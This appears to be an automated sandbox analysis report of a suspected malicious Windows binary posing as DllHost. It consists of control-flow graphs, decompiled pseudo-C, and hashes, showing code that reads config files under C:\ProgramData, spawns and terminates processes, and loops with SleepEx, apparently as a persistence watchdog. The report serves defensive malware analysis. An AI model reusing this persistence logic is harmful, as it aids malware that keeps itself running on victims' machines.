326->332 327->326 333 7ff7191b6014-7ff7191b601f 327->333 342 7ff7191b6091-7ff7191b60b7 call 7ff7191b2b00 331->342 343 7ff7191b60bc-7ff7191b6134 call 7ff7191d4a30 call 7ff7191b8490 call 7ff7191bcca0 331->343 334 7ff7191b6053-7ff7191b6065 call 7ff7191b9c50 332->334 335 7ff7191b606a-7ff7191b607b call 7ff7191bbb30 332->335 333->326 334->314 335->314 342->343 353 7ff7191b6136-7ff7191b6140 343->353 354 7ff7191b6153-7ff7191b6170 call 7ff7191bd550 call 7ff7191ba390 343->354 353->354 359 7ff7191b6142-7ff7191b614d 353->359 361 7ff7191b6172-7ff7191b6192 call 7ff7191b2b00 354->361 362 7ff7191b6197-7ff7191b61a4 call 7ff7191b5330 354->362 359->354 361->362 366 7ff7191b61a6-7ff7191b61c8 CloseHandle call 7ff7191b5470 362->366 367 7ff7191b61da-7ff7191b61f0 call 7ff7191b5470 362->367 374 7ff7191b6206-7ff7191b620e 366->374 375 7ff7191b61ca-7ff7191b61d8 TerminateProcess 366->375 372 7ff7191b61f2-7ff7191b61f5 call 7ff7191b5550 367->372 373 7ff7191b61fc 367->373 380 7ff7191b61fa 372->380 377 7ff7191b61ff-7ff7191b6205 CloseHandle 373->377 378 7ff7191b6210-7ff7191b6226 374->378 379 7ff7191b6246-7ff7191b62cd call 7ff7191b81b0 call 7ff7191d1494 374->379 375->377 377->374 381 7ff7191b6241 call 7ff7191d23d0 378->381 382 7ff7191b6228-7ff7191b623b 378->382 392 7ff7191b62cf-7ff7191b62e6 379->392 393 7ff7191b6306-7ff7191b6322 379->393 380->374 381->379 382->381 384 7ff7191b6553-7ff7191b6558 call 7ff7191da5f8 382->384 391 7ff7191b6559-7ff7191b655e call 7ff7191da5f8 384->391 405 7ff7191b655f-7ff7191b6564 call 7ff7191da5f8 391->405 394 7ff7191b6301 call 7ff7191d23d0 392->394 395 7ff7191b62e8-7ff7191b62fb 392->395 396 7ff7191b6355-7ff7191b636d 393->396 397 7ff7191b6324-7ff7191b6335 393->397 394->393 395->391 395->394 402 7ff7191b63a1-7ff7191b649d call 7ff7191b9470 call 7ff7191d1494 call 7ff7191b81b0 call 7ff7191d1494 396->402 403 7ff7191b636f-7ff7191b6380 396->403 400 7ff7191b6350 call 7ff7191d23d0 397->400 401 7ff7191b6337-7ff7191b634a 397->401 400->396 401->400 401->405 427 7ff7191b649f-7ff7191b64b5 402->427 428 7ff7191b64d6-7ff7191b64de 402->428 407 7ff7191b6382-7ff7191b6395 403->407 408 7ff7191b639b-7ff7191b63a0 call 7ff7191d23d0 403->408 412 7ff7191b6565-7ff7191b656a call 7ff7191da5f8 405->412 407->408 407->412 408->402 421 7ff7191b656b-7ff7191b6570 call 7ff7191da5f8 412->421 429 7ff7191b64d0-7ff7191b64d5 call 7ff7191d23d0 427->429 430 7ff7191b64b7-7ff7191b64ca 427->430 431 7ff7191b6521-7ff7191b654c call 7ff7191d23b0 428->431 432 7ff7191b64e0-7ff7191b6505 call 7ff7191bcc10 428->432 429->428 430->421 430->429 439 7ff7191b6507-7ff7191b651a 432->439 440 7ff7191b651c call 7ff7191d23d0 432->440 439->440 441 7ff7191b654d-7ff7191b6552 call 7ff7191da5f8 439->441 440->431 441->384
                                                                                                                                                              C-Code - Quality: 36%
                                                                                                                                                              			E00007FF77FF7191B5930(long long __rbx, void* __rcx, long long __rsi) {
				void* __rdi;
				void* __rbp;
				signed char _t125;
				signed int _t144;
				signed long long _t173;
				signed long long _t174;
				intOrPtr* _t177;
				void* _t182;
				char* _t200;
				intOrPtr* _t209;
				intOrPtr* _t213;
				signed long long _t222;
				void* _t241;
				signed short* _t250;
				signed long long _t253;
				intOrPtr _t256;
				void* _t259;
				void* _t261;
				void* _t264;
				void* _t266;
				void* _t267;
				void* _t269;
				signed long long _t270;
				void* _t272;
				long long _t275;
				void* _t280;
				void* _t283;
				signed long long _t284;
				void* _t286;

				_t198 = __rbx;
				 *((long long*)(_t269 + 0x10)) = __rbx;
				 *((long long*)(_t269 + 0x18)) = __rsi;
				_t267 = _t269 - 0x150;
				_t270 = _t269 - 0x250;
				_t173 =  *0x192190a0; // 0x590452ce5669
				_t174 = _t173 ^ _t270;
				 *(_t267 + 0x140) = _t174;
				_t264 = __rcx;
				asm("xorps xmm0, xmm0");
				asm("movups [ebp-0x40], xmm0");
				asm("movups [ebp-0x30], xmm0");
				asm("movups [ebp-0x20], xmm0");
				asm("movups [ebp-0x10], xmm0");
				asm("movups [ebp], xmm0");
				asm("movups [ebp+0x10], xmm0");
				 *(_t267 + 0x20) = _t174;
				asm("movups [esp+0x68], xmm0");
				 *(_t270 + 0x78) = _t174;
				 *((intOrPtr*)(_t267 - 4)) = 1;
				r8d = 0x110;
				E00007FF77FF7191D4A30(0, 0, _t267 + 0x30, _t241, _t272);
				E00007FF77FF7191B9520(__rbx, _t267 + 0x30, "C:\\ProgramData\\Data\\config.txt"); // executed
				 *((char*)(_t270 + 0x50)) = 0;
				r14d = 0;
				 *(_t267 - 0x60) = _t284;
				 *(_t267 - 0x50) = _t284;
				 *((long long*)(_t267 - 0x48)) = 0xf;
				 *(_t267 - 0x60) = r14b;
				_t15 = _t284 + 1; // 0x1
				r8d = _t15;
				E00007FF77FF7191BA9A0(_t267 - 0x60, _t270 + 0x50, _t272);
				_t209 =  *((intOrPtr*)( *((intOrPtr*)(_t267 +  *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) + 0x70)) + 8));
				 *((long long*)(_t270 + 0x60)) = _t209;
				_t177 =  *_t209;
				 *((intOrPtr*)(_t177 + 8))();
				E00007FF77FF7191BB100(_t198, _t270 + 0x58, _t264);
				_t125 =  *((long long*)( *((intOrPtr*)( *_t177 + 0x40))))();
				_t213 =  *((intOrPtr*)(_t270 + 0x60));
				if (_t213 == 0) goto 0x191b5a43;
				 *((intOrPtr*)( *_t213 + 0x10))();
				if (_t177 == 0) goto 0x191b5a43;
				_t275 =  *((intOrPtr*)( *_t177));
				_t29 = _t284 + 1; // 0x1
				 *_t275();
				r8d = _t125 & 0xff;
				E00007FF77FF7191BD2D0(_t198, _t267 + 0x30, _t267 - 0x60, _t264, _t284);
				E00007FF77FF7191BA730(_t29, _t198, _t267 + 0x40, _t264, _t280, _t259);
				if (_t177 != 0) goto 0x191b5a8e;
				_t149 =  !=  ? 2 : 6;
				_t150 = ( !=  ? 2 : 6) |  *( *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) + _t267 + 0x30 + 0x10);
				r8d = 0;
				E00007FF77FF7191B2B00(2, ( !=  ? 2 : 6) |  *( *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) + _t267 + 0x30 + 0x10),  *((long long*)( *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) + _t267 + 0x30 + 0x48)),  *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) + _t267 + 0x30);
				_t246 =  >=  ?  *(_t267 - 0x60) : _t267 - 0x60;
				_t261 =  *(_t267 - 0x50) + ( >=  ?  *(_t267 - 0x60) : _t267 - 0x60);
				_t200 =  >=  ?  *(_t267 - 0x60) : _t267 - 0x60;
				 *(_t267 - 0x80) = _t284;
				 *(_t267 - 0x70) = _t284;
				r8d = 7;
				 *((long long*)(_t267 - 0x68)) = _t275;
				if (_t261 - _t200 - 8 < 0) goto 0x191b5ae6;
				E00007FF77FF7191BC130(_t267 - 0x80, _t261 - _t200, _t261, _t267, _t286);
				_t222 = _t284;
				 *(_t267 - 0x70) = _t222;
				 *((long long*)(_t270 + 0x58)) = _t267 - 0x80;
				if (_t200 == _t261) goto 0x191b5b3a;
				r9d =  *_t200;
				if (_t222 -  *((intOrPtr*)(_t267 - 0x68)) >= 0) goto 0x191b5b1f;
				_t53 = _t222 + 1; // 0x1
				 *(_t267 - 0x70) = _t53;
				_t182 =  >=  ?  *(_t267 - 0x80) : _t267 - 0x80;
				 *((intOrPtr*)(_t182 + _t222 * 2)) = r9w;
				 *(_t182 + 2 + _t222 * 2) = r14w;
				goto 0x191b5b28;
				E00007FF77FF7191BC2A0(_t267 - 0x80, _t261, _t267, _t283, _t286);
				if (_t200 + 1 == _t261) goto 0x191b5b3a;
				goto 0x191b5af4;
				0x191da670();
				_t250 =  >=  ?  *(_t267 - 0x80) : _t267 - 0x80;
				_t144 =  *_t250 & 0x0000ffff;
				 *(_t182 - _t250 + _t250) = _t144;
				if (_t144 != 0) goto 0x191b5b60;
				 *((long long*)(_t270 + 0x48)) = _t270 + 0x68;
				 *((long long*)(_t270 + 0x40)) = _t267 - 0x40;
				 *(_t270 + 0x38) = _t284;
				 *(_t270 + 0x30) = _t284;
				 *((intOrPtr*)(_t270 + 0x28)) = 8;
				 *((intOrPtr*)(_t270 + 0x20)) = r14d;
				r9d = 0;
				r8d = 0;
				CreateProcessW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??); // executed
				E00007FF77FF7191D9C88(_t144, ( !=  ? 2 : 6) |  *( *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) + _t267 + 0x30 + 0x10), _t182, _t182, _t266);
				GetLastError();
				CloseHandle(??);
				CloseHandle(??);
				_t253 =  *((intOrPtr*)(_t267 - 0x68));
				if (_t253 - 8 < 0) goto 0x191b5c11;
				if (2 + _t253 * 2 - 0x1000 < 0) goto 0x191b5c0c;
				if ( *(_t267 - 0x80) -  *((intOrPtr*)( *(_t267 - 0x80) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b5d07;
				0x191d23d0();
				 *(_t267 - 0x70) = _t284;
				 *((long long*)(_t267 - 0x68)) = 7;
				 *(_t267 - 0x80) = r14w;
				_t256 =  *((intOrPtr*)(_t267 - 0x48));
				if (_t256 - 0x10 < 0) goto 0x191b5c5d;
				if (_t256 + 1 - 0x1000 < 0) goto 0x191b5c58;
				if ( *(_t267 - 0x60) -  *((intOrPtr*)( *(_t267 - 0x60) - 8)) + 0xfffffff8 - 0x1f > 0) goto 0x191b5d01;
				0x191d23d0();
				 *(_t267 - 0x50) = _t284;
				 *((long long*)(_t267 - 0x48)) = 0xf;
				 *(_t267 - 0x60) = 0;
				 *((long long*)(_t267 +  *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) + 0x30)) = 0x191f9bc0;
				 *((intOrPtr*)(_t267 +  *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) + 0x2c)) =  *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) - 0xb0;
				E00007FF77FF7191B9470( *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) - 0xb0, _t267 + 0x40);
				 *((long long*)(_t267 +  *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) + 0x30)) = 0x191f9798;
				 *((intOrPtr*)(_t267 +  *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) + 0x2c)) =  *((intOrPtr*)( *((intOrPtr*)(_t267 + 0x30)) + 4)) - 0x18;
				 *((long long*)(_t267 + 0xe0)) = 0x191f9778;
				return E00007FF77FF7191D23B0(E00007FF77FF7191D1494(_t267 + 0xe0), _t144,  *(_t267 + 0x140) ^ _t270);
			}
































                                                                                                                                                              0x7ff7191b5930
                                                                                                                                                              0x7ff7191b5930
                                                                                                                                                              0x7ff7191b5935
                                                                                                                                                              0x7ff7191b593e
                                                                                                                                                              0x7ff7191b5946
                                                                                                                                                              0x7ff7191b594d
                                                                                                                                                              0x7ff7191b5954
                                                                                                                                                              0x7ff7191b5957
                                                                                                                                                              0x7ff7191b595e
                                                                                                                                                              0x7ff7191b5961
                                                                                                                                                              0x7ff7191b5966
                                                                                                                                                              0x7ff7191b596a
                                                                                                                                                              0x7ff7191b596e
                                                                                                                                                              0x7ff7191b5972
                                                                                                                                                              0x7ff7191b5976
                                                                                                                                                              0x7ff7191b597a
                                                                                                                                                              0x7ff7191b597e
                                                                                                                                                              0x7ff7191b5982
                                                                                                                                                              0x7ff7191b5987
                                                                                                                                                              0x7ff7191b598c
                                                                                                                                                              0x7ff7191b5995
                                                                                                                                                              0x7ff7191b599f
                                                                                                                                                              0x7ff7191b59af
                                                                                                                                                              0x7ff7191b59b5
                                                                                                                                                              0x7ff7191b59ba
                                                                                                                                                              0x7ff7191b59bd
                                                                                                                                                              0x7ff7191b59c1
                                                                                                                                                              0x7ff7191b59c5
                                                                                                                                                              0x7ff7191b59cd
                                                                                                                                                              0x7ff7191b59d1
                                                                                                                                                              0x7ff7191b59d1
                                                                                                                                                              0x7ff7191b59de
                                                                                                                                                              0x7ff7191b59f1
                                                                                                                                                              0x7ff7191b59f5
                                                                                                                                                              0x7ff7191b59fa
                                                                                                                                                              0x7ff7191b59fd
                                                                                                                                                              0x7ff7191b5a06
                                                                                                                                                              0x7ff7191b5a17
                                                                                                                                                              0x7ff7191b5a1d
                                                                                                                                                              0x7ff7191b5a25
                                                                                                                                                              0x7ff7191b5a2a
                                                                                                                                                              0x7ff7191b5a31
                                                                                                                                                              0x7ff7191b5a36
                                                                                                                                                              0x7ff7191b5a39
                                                                                                                                                              0x7ff7191b5a40
                                                                                                                                                              0x7ff7191b5a43
                                                                                                                                                              0x7ff7191b5a4f
                                                                                                                                                              0x7ff7191b5a58
                                                                                                                                                              0x7ff7191b5a60
                                                                                                                                                              0x7ff7191b5a80
                                                                                                                                                              0x7ff7191b5a83
                                                                                                                                                              0x7ff7191b5a86
                                                                                                                                                              0x7ff7191b5a89
                                                                                                                                                              0x7ff7191b5a97
                                                                                                                                                              0x7ff7191b5aa0
                                                                                                                                                              0x7ff7191b5aac
                                                                                                                                                              0x7ff7191b5ab1
                                                                                                                                                              0x7ff7191b5ab8
                                                                                                                                                              0x7ff7191b5abc
                                                                                                                                                              0x7ff7191b5ac2
                                                                                                                                                              0x7ff7191b5ad0
                                                                                                                                                              0x7ff7191b5ad6
                                                                                                                                                              0x7ff7191b5adb
                                                                                                                                                              0x7ff7191b5ade
                                                                                                                                                              0x7ff7191b5aea
                                                                                                                                                              0x7ff7191b5af2
                                                                                                                                                              0x7ff7191b5af4
                                                                                                                                                              0x7ff7191b5afb
                                                                                                                                                              0x7ff7191b5afd
                                                                                                                                                              0x7ff7191b5b01
                                                                                                                                                              0x7ff7191b5b0d
                                                                                                                                                              0x7ff7191b5b12
                                                                                                                                                              0x7ff7191b5b17
                                                                                                                                                              0x7ff7191b5b1d
                                                                                                                                                              0x7ff7191b5b23
                                                                                                                                                              0x7ff7191b5b2e
                                                                                                                                                              0x7ff7191b5b38
                                                                                                                                                              0x7ff7191b5b3f
                                                                                                                                                              0x7ff7191b5b50
                                                                                                                                                              0x7ff7191b5b60
                                                                                                                                                              0x7ff7191b5b63
                                                                                                                                                              0x7ff7191b5b6f
                                                                                                                                                              0x7ff7191b5b76
                                                                                                                                                              0x7ff7191b5b7f
                                                                                                                                                              0x7ff7191b5b84
                                                                                                                                                              0x7ff7191b5b89
                                                                                                                                                              0x7ff7191b5b8e
                                                                                                                                                              0x7ff7191b5b96
                                                                                                                                                              0x7ff7191b5b9b
                                                                                                                                                              0x7ff7191b5b9e
                                                                                                                                                              0x7ff7191b5ba7
                                                                                                                                                              0x7ff7191b5bb0
                                                                                                                                                              0x7ff7191b5bb5
                                                                                                                                                              0x7ff7191b5bc0
                                                                                                                                                              0x7ff7191b5bcb
                                                                                                                                                              0x7ff7191b5bd1
                                                                                                                                                              0x7ff7191b5bd9
                                                                                                                                                              0x7ff7191b5bf1
                                                                                                                                                              0x7ff7191b5c06
                                                                                                                                                              0x7ff7191b5c0c
                                                                                                                                                              0x7ff7191b5c11
                                                                                                                                                              0x7ff7191b5c15
                                                                                                                                                              0x7ff7191b5c1d
                                                                                                                                                              0x7ff7191b5c22
                                                                                                                                                              0x7ff7191b5c2a
                                                                                                                                                              0x7ff7191b5c3d
                                                                                                                                                              0x7ff7191b5c52
                                                                                                                                                              0x7ff7191b5c58
                                                                                                                                                              0x7ff7191b5c5d
                                                                                                                                                              0x7ff7191b5c61
                                                                                                                                                              0x7ff7191b5c69
                                                                                                                                                              0x7ff7191b5c7c
                                                                                                                                                              0x7ff7191b5c8f
                                                                                                                                                              0x7ff7191b5c97
                                                                                                                                                              0x7ff7191b5cab
                                                                                                                                                              0x7ff7191b5cbb
                                                                                                                                                              0x7ff7191b5cc6
                                                                                                                                                              0x7ff7191b5d00

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle$Process32$CreateNextProcess$ErrorFirstLastLockitLockit::_SnapshotTerminateToolhelp32__std_exception_copystd::_
                                                                                                                                                              • String ID: $C:\ProgramData\Data\config.txt$C:\ProgramData\Systemd\$C:\ProgramData\Systemd\config.txt$C:\ProgramData\Systemd\name.txt$C:\ProgramData\Systemd\process.txt
                                                                                                                                                              • API String ID: 3432791168-3231106152
                                                                                                                                                              • Opcode ID: 7071928203aa03b22b435ff9760325f46395b42eb2b485a965dd0c5f2a87e30b
                                                                                                                                                              • Instruction ID: ce6432ba51de889c9597ebc6aec3664b14250a5750870b808c9018aead8f9afe
                                                                                                                                                              • Opcode Fuzzy Hash: 7071928203aa03b22b435ff9760325f46395b42eb2b485a965dd0c5f2a87e30b
                                                                                                                                                              • Instruction Fuzzy Hash: 47727E32B14B8585EB10DF65E4943EC67B2FB84BACF904135DA0E17AA9DF38D586D310
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B6EB0 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 137filestringcomCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.428644397.00007FF7191B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7191B0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.428609123.00007FF7191B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.428983420.00007FF7191F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429183330.00007FF719219000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.429226699.00007FF71921C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff7191b0000_DllHost.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleResource$FileModule$Createlstrlen$CloseDeleteFindFolderInitializeInstanceLoadLockPathSizeofSpecialWritelstrcat
                                                                                                                                                              • String ID: exe.ico$link description
                                                                                                                                                              • API String ID: 3781226362-2435803949
                                                                                                                                                              • Opcode ID: 42cd4e9ff59423e0887c436279751804f91f5351364618a351cf5bf527f59c97
                                                                                                                                                              • Instruction ID: 7c4487731150dac5afff32c63b94d00dd41b809fac1fe59e32196b35a778634d
                                                                                                                                                              • Opcode Fuzzy Hash: 42cd4e9ff59423e0887c436279751804f91f5351364618a351cf5bf527f59c97
                                                                                                                                                              • Instruction Fuzzy Hash: 20512B32708E4682FB54AF25E854769A3B1FB88BA8F844035CA4E43764EF3DD58ED710
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00007FF7191B6620 Relevance: 25.0, APIs: 10, Strings: 4, Instructions: 524COMMONCrypto
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 618 7ff7191b6620-7ff7191b673d call 7ff7191d4a30 call 7ff7191b8490 call 7ff7191d4a30 call 7ff7191b9520 call 7ff7191ba9a0 call 7ff7191bb100 633 7ff7191b673f-7ff7191b6748 618->633 634 7ff7191b675a-7ff7191b6786 call 7ff7191bd2d0 call 7ff7191ba730 618->634 633->634 639 7ff7191b674a-7ff7191b6754 633->639 641 7ff7191b67b3-7ff7191b6841 call 7ff7191ba9a0 call 7ff7191bab00 634->641 642 7ff7191b6788-7ff7191b67ae call 7ff7191b2b00 634->642 639->634 648 7ff7191b6843-7ff7191b6855 call 7ff7191bc130 641->648 649 7ff7191b685a-7ff7191b6867 641->649 642->641 648->649 651 7ff7191b6869 649->651 652 7ff7191b68bc-7ff7191b68cb 649->652 655 7ff7191b6870-7ff7191b6877 651->655 653 7ff7191b68d0-7ff7191b6917 call 7ff7191bcca0 652->653 665 7ff7191b6935-7ff7191b6955 call 7ff7191bd550 653->665 666 7ff7191b6919-7ff7191b6922 653->666 656 7ff7191b6879-7ff7191b689c 655->656 657 7ff7191b689e-7ff7191b68a3 call 7ff7191bc2a0 655->657 658 7ff7191b68a8-7ff7191b68b3 656->658 657->658 658->652 661 7ff7191b68b5-7ff7191b68ba 658->661 661->655 670 7ff7191b6990-7ff7191b699f call 7ff7191ba390 665->670 671 7ff7191b6957-7ff7191b6961 665->671 666->665 672 7ff7191b6924-7ff7191b692f 666->672 681 7ff7191b69a1-7ff7191b69c7 call 7ff7191b2b00 670->681 682 7ff7191b69cc-7ff7191b6a44 call 7ff7191d4a30 call 7ff7191b8490 call 7ff7191bcca0 670->682 673 7ff7191b6963-7ff7191b6975 call 7ff7191b9c50 671->673 674 7ff7191b697a-7ff7191b698b call 7ff7191bbb30 671->674 672->665 673->653 674->653 681->682 692 7ff7191b6a46-7ff7191b6a50 682->692 693 7ff7191b6a63-7ff7191b6a80 call 7ff7191bd550 call 7ff7191ba390 682->693 692->693 698 7ff7191b6a52-7ff7191b6a5d 692->698 700 7ff7191b6a82-7ff7191b6aa2 call 7ff7191b2b00 693->700 701 7ff7191b6aa7-7ff7191b6ab4 call 7ff7191b5330 693->701 698->693 700->701 705 7ff7191b6ab6-7ff7191b6ad8 CloseHandle call 7ff7191b5470 701->705 706 7ff7191b6aea-7ff7191b6b00 call 7ff7191b5470 701->706 713 7ff7191b6b16-7ff7191b6b1e 705->713 714 7ff7191b6ada-7ff7191b6ae8 TerminateProcess 705->714 711 7ff7191b6b02-7ff7191b6b05 call 7ff7191b5930 706->711 712 7ff7191b6b0c 706->712 719 7ff7191b6b0a 711->719 716 7ff7191b6b0f-7ff7191b6b15 CloseHandle 712->716 717 7ff7191b6b20-7ff7191b6b36 713->717 718 7ff7191b6b56-7ff7191b6bdd call 7ff7191b81b0 call 7ff7191d1494 713->718 714->716 716->713 720 7ff7191b6b51 call 7ff7191d23d0 717->720 721 7ff7191b6b38-7ff7191b6b4b 717->721 730 7ff7191b6bdf-7ff7191b6bf6 718->730 731 7ff7191b6c16-7ff7191b6c32 718->731 719->713 720->718 721->720 723 7ff7191b6e63-7ff7191b6e68 call 7ff7191da5f8 721->723 732 7ff7191b6e69-7ff7191b6e6e call 7ff7191da5f8 723->732 733 7ff7191b6c11 call 7ff7191d23d0 730->733 734 7ff7191b6bf8-7ff7191b6c0b 730->734 735 7ff7191b6c65-7ff7191b6c7d 731->735 736 7ff7191b6c34-7ff7191b6c45 731->736 745 7ff7191b6e6f-7ff7191b6e74 call 7ff7191da5f8 732->745 733->731 734->732 734->733 741 7ff7191b6cb1-7ff7191b6dad call 7ff7191b9470 call 7ff7191d1494 call 7ff7191b81b0 call 7ff7191d1494 735->741 742 7ff7191b6c7f-7ff7191b6c90 735->742 739 7ff7191b6c60 call 7ff7191d23d0 736->739 740 7ff7191b6c47-7ff7191b6c5a 736->740 739->735 740->739 740->745 767 7ff7191b6daf-7ff7191b6dc5 741->767 768 7ff7191b6de6-7ff7191b6dee 741->768 747 7ff7191b6c92-7ff7191b6ca5 742->747 748 7ff7191b6cab-7ff7191b6cb0 call 7ff7191d23d0 742->748 751 7ff7191b6e75-7ff7191b6e7a call 7ff7191da5f8 745->751 747->748 747->751 748->741 760 7ff7191b6e7b-7ff7191b6e90 call 7ff7191da5f8 751->760 766 7ff7191b6e94-7ff7191b6ea9 call 7ff7191b5d10 call 7ff7191b6620 SleepEx 760->766 770 7ff7191b6de0-7ff7191b6de5 call 7ff7191d23d0 767->770 771 7ff7191b6dc7-7ff7191b6dda 767->771 773 7ff7191b6e31-7ff7191b6e5c call 7ff7191d23b0 768->773 774 7ff7191b6df0-7ff7191b6e15 call 7ff7191bcc10 768->774 770->768 771->760 771->770 783 7ff7191b6e17-7ff7191b6e2a 774->783 784 7ff7191b6e2c call 7ff7191d23d0 774->784 783->784 785 7ff7191b6e5d-7ff7191b6e62 call 7ff7191da5f8 783->785 784->773 785->723
                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                              			E00007FF77FF7191B6620(void* __ecx, void* __ebp, long long __rbx, long long __rdi, long long __rsi) {
				void* __rbp;
				void* __r14;
				void* __r15;
				void* _t238;
				void* _t240;
				signed char _t246;
				void* _t250;
				signed short _t258;
				void* _t264;
				void* _t265;
				signed short _t270;
				void* _t274;
				void* _t288;
				void* _t289;
				void* _t294;
				signed long long _t369;
				intOrPtr* _t373;
				void* _t379;
				intOrPtr* _t382;
				intOrPtr _t383;
				intOrPtr* _t388;
				long long _t390;
				char* _t425;
				intOrPtr* _t436;
				intOrPtr* _t440;
				signed long long _t451;
				intOrPtr* _t455;
				intOrPtr* _t459;
				intOrPtr* _t472;
				intOrPtr* _t476;
				void* _t482;
				intOrPtr _t522;
				void* _t526;
				void* _t534;
				signed long long _t544;
				signed long long _t547;
				intOrPtr _t550;
				intOrPtr _t553;
				signed long long _t556;
				void* _t567;
				long long _t572;
				void* _t575;
				intOrPtr* _t576;
				void* _t578;
				signed long long _t579;
				void* _t581;
				long long _t584;
				void* _t593;
				void* _t595;
				signed long long _t596;
				void* _t598;

				_t572 = __rsi;
				_t423 = __rbx;
				_t294 = __ecx;
				 *((long long*)(_t578 + 8)) = __rbx;
				 *((long long*)(_t578 + 0x10)) = __rsi;
				 *((long long*)(_t578 + 0x18)) = __rdi;
				_t576 = _t578 - 0x340;
				_t579 = _t578 - 0x440;
				_t369 =  *0x192190a0; // 0x590452ce5669
				 *(_t576 + 0x330) = _t369 ^ _t579;
				asm("xorps xmm1, xmm1");
				asm("movdqu [esp+0x68], xmm1");
				r14d = 0;
				 *(_t579 + 0x78) = _t596;
				 *(_t576 - 0x20) = _t596;
				 *(_t576 - 0x10) = _t596;
				 *((long long*)(_t576 - 8)) = 7;
				 *(_t576 - 0x20) = r14w;
				r8d = 0x110;
				E00007FF77FF7191D4A30(_t238, 0, _t576 + 0x220, _t526, _t581);
				_t240 = E00007FF77FF7191B8490(__rbx, _t576 + 0x220, "C:\\ProgramData\\Data\\process.txt"); // executed
				r8d = 0x110;
				E00007FF77FF7191D4A30(_t240, 0, _t576 + 0x110, "C:\\ProgramData\\Data\\process.txt", _t581);
				E00007FF77FF7191B9520(_t423, _t576 + 0x110, "C:\\ProgramData\\Data\\name.txt"); // executed
				 *(_t579 + 0x30) = r14b;
				 *(_t576 - 0x40) = _t596;
				 *(_t576 - 0x30) = _t596;
				 *((long long*)(_t576 - 0x28)) = 0xf;
				 *(_t576 - 0x40) = r14b;
				_t20 = _t596 + 1; // 0x1
				r8d = _t20;
				E00007FF77FF7191BA9A0(_t576 - 0x40, _t579 + 0x30, _t581);
				_t436 =  *((intOrPtr*)( *((intOrPtr*)(_t576 +  *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) + 0x150)) + 8));
				 *((long long*)(_t579 + 0x40)) = _t436;
				_t373 =  *_t436;
				 *((intOrPtr*)(_t373 + 8))();
				E00007FF77FF7191BB100(_t423, _t579 + 0x38, __rsi);
				_t246 =  *((long long*)( *((intOrPtr*)( *_t373 + 0x40))))();
				_t440 =  *((intOrPtr*)(_t579 + 0x40));
				if (_t440 == 0) goto 0x191b675a;
				 *((intOrPtr*)( *_t440 + 0x10))();
				if (_t373 == 0) goto 0x191b675a;
				_t34 = _t596 + 1; // 0x1
				 *((long long*)( *((intOrPtr*)( *_t373))))();
				r8d = _t246 & 0xff;
				E00007FF77FF7191BD2D0(_t423, _t576 + 0x110, _t576 - 0x40, _t572, _t598);
				_t250 = E00007FF77FF7191BA730(_t34, _t423, _t576 + 0x120, _t572, _t593, _t596);
				_t38 = _t572 - 4; // 0x2
				r15d = _t38;
				if (_t373 != 0) goto 0x191b67b3;
				_t300 =  !=  ? r15d : 6;
				_t301 = ( !=  ? r15d : 6) |  *( *((intOrPtr*)( *((intOrPtr*)(_t576 + 0x110)) + 4)) + _t576 + 0x110 + 0x10);
				r8d = 0;
